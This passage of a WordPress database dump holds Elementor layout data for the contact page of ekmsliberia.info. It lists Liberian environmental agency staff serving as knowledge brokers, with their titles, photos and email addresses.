href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23427,3406,'_elementor_edit_mode','builder'),(23428,3406,'_elementor_template_type','wp-page'),(23429,3406,'_elementor_version','3.0.16'),(23430,3406,'_wp_page_template','default'),(23431,3406,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"is